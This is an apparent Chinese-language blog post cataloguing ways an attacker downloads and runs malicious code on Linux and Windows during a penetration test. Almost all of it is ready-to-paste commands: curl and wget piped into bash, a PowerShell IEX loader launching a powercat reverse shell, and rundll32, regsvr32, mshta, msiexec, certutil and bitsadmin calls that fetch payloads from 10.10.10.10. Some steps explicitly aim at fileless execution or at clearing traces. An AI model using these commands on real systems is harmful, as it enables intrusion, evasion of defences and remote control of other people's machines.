Download Malicious Code

發佈日期: 作者:

在滲透過程中,攻擊者往往需要透過指令下載執行惡意程式碼,實現資訊收集、持久化、權限提升、防禦繞過、提取憑證、橫向移動、資料滲出等操作。以下總結Linux和Windows中下載和執行惡意程式碼的常見方法。

Linux

1.curl

以curl的方式執行http頁面上的shell腳本,無需download,在本機上直接執行。

方式1:curl http://10.10.10.10/test.sh | bash

方式2:bash < <( curl http://10.10.10.10/test.sh)

2.wget

執行wget命令遠端下載惡意程式。

方式1:wget -q -O- http://10.10.10.10/test.sh | bash

方式2:wget http://10.10.10.10/shell.txt -O /tmp/x.php && php /tmp/x.php

方式3:curl+wget合併,實現無檔案遠端惡意程式碼執行。

bash -c '(curl -fsSL http://10.10.10.10/test.sh||wget -q -O- http://10.10.10.10/test.sh)|bash -sh >/dev/null 2>&1&'

3.rcp

rcp指令用於複製遠端檔案或目錄。

rcp root@x.x.x.x:./testfile testfile

4.scp

scp 是rcp 的加強版,scp是加密的,rcp是不加密的。

scp username@servername:/path/filename /tmp/local_destination

5.rsync

使用rsync可以進行遠端同步,拉取檔案到本機伺服器。

rsync -av 10.10.10.10 :/tmp/passwd.txt /tmp/passwd.txt

6.sftp

使用sftp下載遠端伺服器上的檔案。

sftp admin@10.10.10.10 <<EOF  
get  /tmp/2.txt            
quit 
EOF

Windows

1.Powershell

利用powershell遠端執行ps1腳本。

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.10/powercat.ps1');powercat -c 10.10.10.10 -p 6666 -e cmd

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10/evil.txt'))"

2.rundll32

使用rundll32.exe,可以透過mshtml.dll執行JavaScript ,依賴WScript.shell這個元件

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://10.10.10.10/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

3.regsvr32

遠端載入執行,解析.src檔。

regsvr32.exe /u /n /s /i:http://10.10.10.10/file.sct scrobj.dll

4.wmic

執行WMIC以下命令從遠端伺服器下載並執行惡意XSL檔案:

wmic os get /FORMAT:"http://10.10.10.10/evil.xsl"

5.msiexec

用於安裝Windows Installer安裝包,可遠端執行msi檔案。

msiexec /q /i http://10.10.10.10/evil.msi

6.IEExec

IEexec.exe應用程式是.NET Framework附帶程序,執行IEExec.exe並使用url啟動其他程式。

crosoft.NET\Framework64\v2.0.50727>caspol.exe -s off C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://10.10.10.10/evil.exe

7.mshta

mshta用於執行.hta文件

mshta http://10.10.10.10/run.hta

8.msxsl

msxsl.exe是微軟用來命令列下處理XSL的程式

msxsl http://10.10.10.10/scripts/demo.xml http://10.10.10.10/scripts/exec.xsl

9.pubprn.vbs

在Windows 7以上版本存在一個名為pubprn.vbs的微軟已簽署WSH腳本,可以利用來解析.sct腳本:

cscript pubprn.vbs 127.0.0.1 script:https://10.10.10.10/file.sct

10.Bitsadmin

利用bitsadmin指令下載檔案到目標機。

bitsadmin /transfer n http://10.10.10.10/imag/evil.bat d:\test\1.bat

11.certutil

用於備份憑證服務,一般建議下載完檔案後對快取進行刪除。

下载文件 certutil -urlcache -split -f http://10.10.10.10/imag/evil.txt test.php

删除缓存 certutil -urlcache -split -f http://10.10.10.10/imag/evil.txt delete

refer:
https://www.cnblogs.com/xiaozi/p/13534602.html